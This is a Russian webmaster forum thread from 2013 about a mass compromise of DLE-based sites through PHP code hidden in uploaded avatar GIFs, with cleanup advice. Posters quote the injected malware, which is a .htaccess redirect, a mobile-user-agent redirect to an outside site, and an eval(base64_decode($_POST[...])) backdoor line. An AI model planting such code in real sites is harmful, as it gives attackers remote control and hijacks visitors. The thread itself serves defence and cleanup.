- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Что это означает:
1. Бот регистрируется как пользователь сайта.
2. После регистрации загружает аватар.
3. Через интерфейс отправки приватных сообщений ВЫПОЛНЯЕТ код, загруженный под видом аватара.
4. Удаляет аватар.
Уже давно эта ситуевина известна. Несколько страниц назад обсуждалась. :)
---------- Добавлено 08.04.2013 в 20:43 ----------
теперь мошенник использует немного другой код ☝
Искать по левым урлам, смотреть дату изменения файлов на сервере...
Всем добрый день!!! Присоединяюсь к сообществу, поскольку вчера весь вечер потратил на прочтение всех 40-ка страниц темы и на решение проблемы. Всем спасибо за советы, помогли. Кстати у меня такого пользователя на сайте нету, заражен был где-то также в январе приблизительно, вчера только руки дошли... Не думал даже что все настолько масштабно.
Такой вопрос, сайты ломаются только те, которые на VPS или на хостинге тоже? Ато у меня сайт на впс пострадал, а тот, который на хостинге пока не тронут. Еще такой вопрос, я так понимаю, как работает эта славноизвестная гифка пока никому не ясно? А можно ли бекапнуть эту гифку после того, как она была удалена с сайта? Или это из раздела фантастики? )))) Еще раз всем спасибо за помощь!!!
Ломают через дыру в DLE это не зависит от хостинга.
В гиф'ке просто пхп код на внедрение вредоносного кода в ваши файлы(поиск и запись в файлы).
Подытожим для тех кто не хочет все искать и читать кучу страниц. 🍿
Зараженные файлы:
.htaccess
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
language/Russian/language.lng
Ниже указаны коды, которые необходимо удалить в каждом из указанных файлов.
Код в .htaccess
RewriteCond %{QUERY_STRING} (^|&)noredirect=true(&|$)RewriteRule ^ - [CO=mredir:0:%{HTTP_HOST},S]
RewriteCond %{HTTP:x-wap-profile} !^$ [OR]
RewriteCond %{HTTP:Profile} !^$
RewriteCond %{HTTP_HOST} !^m\.
RewriteCond %{HTTP:Cookie} !\smredir=0(;|$)
RewriteRule ^ http://$host/ [R,L]
Код в файлах engine/engine.php, engine/init.php, engine/data/config.php, engine/data/dbconfig.php
Код может отличаться.
В engine/engine.php, engine/init.php просматриваем полностью каждый файл. Сам код повторяется и находится в разных местах.
В engine/data/config.php, engine/data/dbconfig.php код находится в самом начале файла и в конце.
Код в language/Russian/language.lng
В самом конце находится примерно такой код:
@setlocale(LC_ALL, array("ru_RU.CP1251", "ru_SU.CP1251", "ru_RU.KOI8-r", "ru_RU", "russian", "ru_SU", "ru"));if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://getinternet.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
Как проверить, что все удалено?
В мозилле устанавливаем аддон:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ - нужен для того, чтобы переключить юзерагент.
После установки аддона выносим кнопку на панель (зайти в Настройки панели инструментов).
Далее.
В отдельный файл помещаем все свои сайты (урлы). Дальше вставляем в форму на этом сайте:
http://www.urlopener.com/index.php - позволит открыть все сайты разом.
После открытия всех сайтов включаем юзерагент (выбираем Iphone). Теперь на каждом сайте жмем F5 или обновляем страниц по-другому. И смотрим что произойдет. Если что-то не было удалено или не до конца почищено, то произойдет редирект на левый сайт. Если все удалено, то мы увидим нормальную страницу с контентом.
goliafz поправлю вас:
файла language/Russian/language.lng нет, править language/Russian/website.lng
и в нем эту строчку
не трогать...
и опять же выбрать User Agent лучше не айфон, а андройд...
А как там добавить андроид? В списке User Agent его нет.
Хотел поинтересоваться, у всех в этом топике лицензии стоят или в основном нуленные версии? В последнее время на мой сайт начали лить всякую гадость, уже не успеваю отбиваться. Про снижение трафа у сайта (в 3 раза), я вообще молчу. Версия на сайте нуленная (9.3).
Есть ли смысл в покупки лицензии и повышает ли она безопасность сайта?
Хотел поинтересоваться, у всех в этом топике лицензии стоят или в основном нуленные версии? В последнее время на мой сайт начали лить всякую гадость, уже не успеваю отбиваться. Про снижение трафа у сайта (в 3 раза), я вообще молчу. Версия на сайте нуленная (9.3).
Читайте тему, ломают и те и другие. Никто ничего не слышал о том, как закрыть эту дыру? Или достаточно сделать гифки статичными?
goliafz поправлю вас:
файла language/Russian/language.lng нет, править language/Russian/website.lng
и в нем эту строчку
не трогать...
Да, ошибся.
А почему эту строчку не трогать?
Я ее по нечайке со всех своих сайтов удалил 😂
Почему лучше андроид? Я на айфоне тестировал и у меня один сайт не был до конца почищен и все показалось.
---------- Добавлено 09.04.2013 в 20:51 ----------
Ничего не решает лицензия. ДЛЕ - вообще дырявая.
Разработчики организовали обновление крайне убого. Если стоят какие-то модули, рюшечки, то после обновления считай все это нужно заново устанавливать, добавлять в файлы. Поэтому многие не обновляются, а остаются на том, что есть.
Я даже заметил такую веселость, что после очистки кэша в админке - исчезают новые категории на сайте.
Жаль конечно, что лицензия не решает проблемы со всякой вирусней. Придется латать дыры или переходить на другой двиг.
goliafz строчка та от движка...
айфон не подвержен заражению, соответственно и вставок срабатывающих на андройд больше (например 'An'.'dr'.'oid').
проверять 3 агентами: андройд, айфон, виндовсфон чтобы наверняка...